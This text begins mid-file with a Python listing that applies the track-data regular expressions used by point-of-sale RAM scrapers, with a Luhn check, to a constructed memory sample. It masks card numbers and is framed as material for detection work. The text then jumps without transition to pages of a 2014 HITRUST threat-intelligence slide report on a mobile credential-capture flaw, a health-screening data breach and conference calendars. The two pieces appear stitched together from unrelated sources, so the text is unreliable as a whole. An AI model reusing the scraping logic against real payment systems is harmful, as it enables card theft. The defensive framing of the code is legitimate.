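# ISO/IEC 7813 framing. Track 1: "%B<PAN>^<NAME>^<YYMM><service code/discretionary>?"
#                        Track 2: ";<PAN>=<YYMM><service code/discretionary>?"
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{4})\d{0,20}\?")
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})\d{0,20}\?")


def luhn_ok(pan: str) -> bool:
    """Luhn check; scrapers use it to drop digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep BIN and last four, as a report should; never write the full PAN out."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf: bytes) -> list:
    """Every Luhn-valid track record in buf, in memory order."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            yymm = m.group(3).decode()
            hits.append({"offset": m.start(), "track": 1, "pan": mask(pan),
                         "name": m.group(2).decode(errors="replace"),
                         "expiry": f"{yymm[2:]}/{yymm[:2]}"})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            yymm = m.group(2).decode()
            hits.append({"offset": m.start(), "track": 2, "pan": mask(pan),
                         "expiry": f"{yymm[2:]}/{yymm[:2]}"})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed memory image: padding, an application log line that contains the PAN
# without track framing (ignored), a Track 1 record, a Track 2 record, and a Track 2
# decoy whose PAN fails the Luhn check (ignored).
SAMPLE_MEMORY = (
    b"\x00" * 16
    + b"POSApp log: txn 4111111111111111 approved\n"
    + b"%B4111111111111111^DOE/JOHN^2512101000000000?"
    + b"\x00\x90" * 4
    + b";4111111111111111=2512101000000000?"
    + b";4111111111111112=2512101000000000?"
    + b"\xff" * 8
)


if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

Two things carry over from this to detection work: the regular expressions are the same ones scrapers embed, so they make usable YARA strings for hunting scraper binaries, and a clean result on a dump of the payment process is the evidence that point-to-point encryption at the reader is actually keeping track data out of the application’s memory.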


Page 22

Critical Vulnerabilities Identified in Common Mobile Applications

• Critical vulnerability found in mobile operating systems that could allow a malicious actor to hijack and capture information entered into the phone

– Information such as usernames, passwords, and online-banking login credentials

• Researchers tested their attack on mobile applications (apps) including those from Gmail, Chase Bank, H&R Block, WebMD, and Amazon

• They tested this vulnerability using seven different mobile apps and found that they could log account details and other sensitive user inputs from each app, albeit at different rates:

– Gmail (92 % of attempts), Chase Bank (83 %), H&R Block (92 %), Amazon (48 %), WebMD (84 %), NewEgg (86 %), and Hotel[.]com (83 %)

• Cyber4Sight assesses this to be a unique but defensible mobile-device vulnerability. Although the attack vector appears to work against a variety of apps, it still requires the installation of a malicious background app, which steals the credentials through shared memory.


Page 23: HITRUST Cyber Threat Intelligence and Incident ...hitrustalliance.net/content/uploads/2014/09/HITRUST-Monthly-Cyber... · • Cyber-Espionage Campaign Targets Norwegian Oil Companies

Onsite Health Diagnostics Linked to Another Data Breach

• A data breach was discovered in an online-scheduling application for health screenings used by more than 4,500 employees enrolled in an employee wellness program of Ohio-based financial institution Huntington Bancshares

• The stolen data was stored by Texas-based Onsite Health Diagnostics (OHD), which was a third-party contractor of Minnesota-based StayWell Health Management

• The breach reportedly included names, usernames, email addresses, physical addresses, dates of birth, phone numbers, and genders

– Social security numbers, as well as health and financial information, were supposedly not compromised

• Cyber4Sight assesses that, in addition to the three institutions identified by The Columbus Dispatch, the 25 March breach of OHD also likely affected the Tennessee Benefits Administration and the Kansas City Children’s Mercy Hospital, based on these companies’ disclosures, which listed similar timeframes, attack vectors, and compromised data.


Calendar

• 8 September: Moon/Mid-Autumn Festival in China and Vietnam

• 8–17 September: Retail Cyber Security Summit in Texas

• 11 September: Anniversary of attacks on the World Trade Center and the Pentagon (2001)

• 16 September: Independence Day in Mexico

• 17–19 September: Automotive User Interfaces conference in Seattle

• 22–24 September: Cryptography and Security Systems conference in Poland

• 24–26 September: Infosecurity Russia 2014

• 25 September: Rosh Hashana (Jewish holiday)

• 22–24 September: Cyber Intelligence Europe conference

• 27–30 September: Iranian Cybersecurity Expo

• 30 September–1 October: HealthSec 2014 in California


Calendar continued

• 1 October: National Day in China

• 4 October: Yom Kippur (Jewish holiday)

• 5 October: Eid al-Adha (Muslim holiday)

• 6 October: Anniversary of beginning of Yom Kippur War (1973); anniversary of the assassination of Egyptian President Anwar Sadat (1981)

• 13 October: Columbus Day in the United States

• 14–17 October: Black Hat Europe in the Netherlands

• 20–23 October: ICS Cyber Security Conference in Atlanta

• 21–22 October: Cyber Security Summit 2014 in Minneapolis

• 23–24 October: Central and Eastern European Software Engineering Conference in Russia

• 29 October: Republic Day in Turkey

• 29–31 October: Wireless Health conference in Maryland

• 3 November: Ashura (Shi’a Muslim holiday)


Calendar continued

• 5 November: Guy Fawkes Day

• 5–7 November: Cybercrime Prevention Summit in California

• 11 November: Veterans Day in the United States

• 12–13 November: PacSec Conference in Japan

• 18–19 November: Embedded Security in Cars Conference (ESCAR) in Germany

• 18–21 November: DeepSec Conference in Austria

• 19–20 November: Cloud Security Alliance Congress in Italy

• 27 November: Thanksgiving Day in the United States


Additional Information

• Sign up for briefings and alerts: www.hitrustalliance.net/cyberupdates/

• CyberRX future exercise sign up or Spring 2014 exercise findings: www.hitrustalliance.net/cyberrx/


Additional Information

Additional content available at www.hitrustalliance.net/content-spotlight/
